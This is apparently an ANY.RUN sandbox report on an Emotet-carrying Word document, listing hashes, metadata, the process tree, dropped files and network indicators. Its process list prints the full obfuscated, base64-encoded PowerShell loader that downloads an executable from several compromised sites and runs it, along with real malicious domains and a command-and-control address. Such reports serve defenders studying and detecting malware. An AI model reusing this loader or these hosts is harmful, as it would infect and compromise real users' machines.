analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Projekt_umowy_851858_18_09_2019.doc

Full analysis: https://app.any.run/tasks/ee108ac8-b50e-4088-a528-012a7ab6f4cb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 12:25:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Bahamas Turnpike, Subject: Tasty Granite Table, Author: Kellie Larson, Comments: Points, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:22:00 2019, Last Saved Time/Date: Wed Sep 18 07:22:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

14718C85B37F87F4ED4ACF83CA6E9774

SHA1:

78B11AEE5F7236E239FDDA8DE1195C0E9706130D

SHA256:

46E902CC690517928A63C5C5A7C3A97822C6B9A00D353839094065432047C122

SSDEEP:

6144:mVqZiq86MofT1K82zw1qWKWPLkIp7NSU4jJntATfDnAvLipwwPCQ3cq4:mVqZiq86MofT1K82zw1qWKEXp7NSU4Vx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • easywindow.exe (PID: 3988)
      • 373.exe (PID: 2352)
      • 373.exe (PID: 3764)
      • 373.exe (PID: 2592)
      • 373.exe (PID: 3648)
      • easywindow.exe (PID: 3872)
      • easywindow.exe (PID: 2940)
      • easywindow.exe (PID: 3072)

    • Emotet process was detected

      • 373.exe (PID: 2592)

  • SUSPICIOUS

    • Starts itself from another location

      • 373.exe (PID: 2592)

    • Application launched itself

      • 373.exe (PID: 2352)

    • PowerShell script executed

      • powershell.exe (PID: 2504)

    • Executed via WMI

      • powershell.exe (PID: 2504)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2504)
      • 373.exe (PID: 2592)

    • Creates files in the user directory

      • powershell.exe (PID: 2504)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3560)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3560)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Bahamas Turnpike
Subject: Tasty Granite Table
Author: Kellie Larson
Keywords: -
Comments: Points
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 06:22:00
ModifyDate: 2019:09:18 06:22:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Kub, Ziemann and Cummerata
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Reilly
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 373.exe no specs 373.exe no specs 373.exe no specs #EMOTET 373.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3560"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Projekt_umowy_851858_18_09_2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2504powershell -encod JAB6AHoATAA5AHMAYwA3AFUAPQAnAG0AVwBiAEoATwA0ACcAOwAkAEMAbgAwAFAAcgB0ACAAPQAgACcAMwA3ADMAJwA7ACQAcwBLAHEAdwA0AHUAPQAnAEIAcwBJAGIAagBqAFMAdQAnADsAJABJAEMAMABmAFEAdgBGADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAbgAwAFAAcgB0ACsAJwAuAGUAeABlACcAOwAkAEsAVgBoAGsAOABaAEIASgA9ACcAdQBaAEcANAA1AG8AMwAnADsAJAB3AG8AaQAzAFMAdQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAQgBjAGwAaQBFAG4AdAA7ACQAQwBXAGIAYQAzAHcARABzAD0AJwBoAHQAdABwADoALwAvAGQAaQByAHAAcgBvAHAAZQByAHQAaQBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBmAGQAMQA0ADkAOQA5AC8AQABoAHQAdABwADoALwAvAHIAdQBuAC0AZwBlAHIAbQBhAG4AeQAuAGMAbwBtAC8AcwBjAHIAaQBwAHQAcwAvAGoAYwA4ADIAOAAyADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBzAGEAeAB0AG8AcgBwAGgALgBuAGUAdAAvAEQATwBDAC8ANQBuAGQAcQBvAHYAMAAxADgALwBAAGgAdAB0AHAAcwA6AC8ALwBzAHUAawBoAHUAbQB2AGkAdABoAG8AbQBlAHMALgBjAG8AbQAvAHMAYQB0AGgAbwByAG4AYwBvAG4AZABvAHMALgBjAG8AbQAvAHUAYwB3AG4AYQA3ADkANAAvAEAAaAB0AHQAcAA6AC8ALwB2AGEAbgBzAGMAaABlAGUAcgBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AZwBvAHIAcAA3AHYANAA1ADUAMwA3ADAALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAJwBAACcAKQA7ACQAQwBUAE4ARAB0ADUAPQAnAGoATgB3AEoAYQAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABqAFgASQBPAFIASAB0ACAAaQBuACAAJABDAFcAYgBhADMAdwBEAHMAKQB7AHQAcgB5AHsAJAB3AG8AaQAzAFMAdQAuACIAZABPAHcAYABOAGAATABvAGAAQQBkAGYASQBsAEUAIgAoACQAagBYAEkATwBSAEgAdAAsACAAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAWABoAFIATwBRAHYAPQAnAEEAMQBuAGwAUABpADMAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAQwAwAGYAUQB2AEYANQApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMgA1ADgAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAVAAiACgAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAUwBfAFIAegByAFQAPQAnAHcASwBpAGkAYQA1AHQAJwA7AGIAcgBlAGEAawA7ACQAaQBhAEQAUwBrAGIAPQAnAE4AQgAwAEUAVwBHAGoAQQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAEwAdABrADcARgBXAHcAPQAnAFIATQBzAGgARwB2AEcAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2352"C:\Users\admin\373.exe" C:\Users\admin\373.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3648"C:\Users\admin\373.exe" C:\Users\admin\373.exe373.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3764--92e680edC:\Users\admin\373.exe373.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2592--92e680edC:\Users\admin\373.exe
373.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3988"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe373.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2940"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3072--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3872--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 774
Read events
1 282
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3560WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B3B.tmp.cvr
MD5:
SHA256:
3560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7008E496.wmfwmf
MD5:54A8ADA035030C484825803EE555E943
SHA256:2E087EC6AF53079C67F8E8750BC4CACB7DB780850C7B94412FAF73C3F9BB3D44
3560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC4851DA.wmfwmf
MD5:C1F86145E6E5F59B0741FEAB064B1A1F
SHA256:355EE52D5F9BDF2CBC27AA60106F071108AD488721153B675947C9B7941903F8
3560WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C6CCA38B653CB96CEE4D992EC1160316
SHA256:77F064971B2635212437CD454AD10DE0235CB7328581A6ADBE5D417BDE35AD12
3560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89E020AE.wmfwmf
MD5:261B351E9725D6B8EC9892B84E6C6C72
SHA256:C3C07A7CB2C05D6B31E6053DDAE2677E42A66639D744B02E3EB32D98AE5C2856
3560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92CDA042.wmfwmf
MD5:E11D32D235C0751A5D7246B7E1615112
SHA256:C8541DDBAEB7E7FB5DBA1B8AB79B8B1763DEC71D9408F6E033F2B2454E91AA30
3560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A2EE3514.wmfwmf
MD5:82228F7DE41BF35135FAD1EB26E35806
SHA256:0F64C65C1FFCC6F25F08EFDC19CB01E5391E20989B29012CAE85751769414722
3560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58DD80EC.wmfwmf
MD5:804F5936D97FF7A00E66E67F5FEEBECE
SHA256:78426996488E914B174A5986341D87F6A9BC290EBAF916AF1C4F080C693614DA
3560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42D85748.wmfwmf
MD5:7F6AF9D6F307F7E010DF08B57B5390C7
SHA256:A54DC2396005CDBCC86640771776C0F69170BE5F4A4D5EF6D665216B65F09624
3560WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBDFE9A0.wmfwmf
MD5:063817742173A9018C9E1AEEB9A9A2AD
SHA256:9C4629C5B20919A11084C966B66D29F5FF6A61B2136226A3CFDA7903762EEB5D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2504
powershell.exe
GET
406
93.191.156.116:80
http://saxtorph.net/DOC/5ndqov018/
DK
html
221 b
suspicious
3872
easywindow.exe
POST
114.79.134.129:443
http://114.79.134.129:443/prov/
IN
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2504
powershell.exe
45.120.148.57:443
sukhumvithomes.com
A2 Hosting, Inc.
SG
suspicious
2504
powershell.exe
173.254.28.118:80
dirproperties.com
Unified Layer
US
suspicious
2504
powershell.exe
93.191.156.116:80
saxtorph.net
Zitcom A/S
DK
suspicious
3872
easywindow.exe
114.79.134.129:443
D-Vois Broadband Pvt Ltd
IN
malicious
2504
powershell.exe
81.169.145.69:80
run-germany.com
Strato AG
DE
malicious

DNS requests

Domain
IP
Reputation
dirproperties.com
  • 173.254.28.118
suspicious
run-germany.com
  • 81.169.145.69
malicious
saxtorph.net
  • 93.191.156.116
suspicious
sukhumvithomes.com
  • 45.120.148.57
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Projekt_umowy_851858_18_09_2019.doc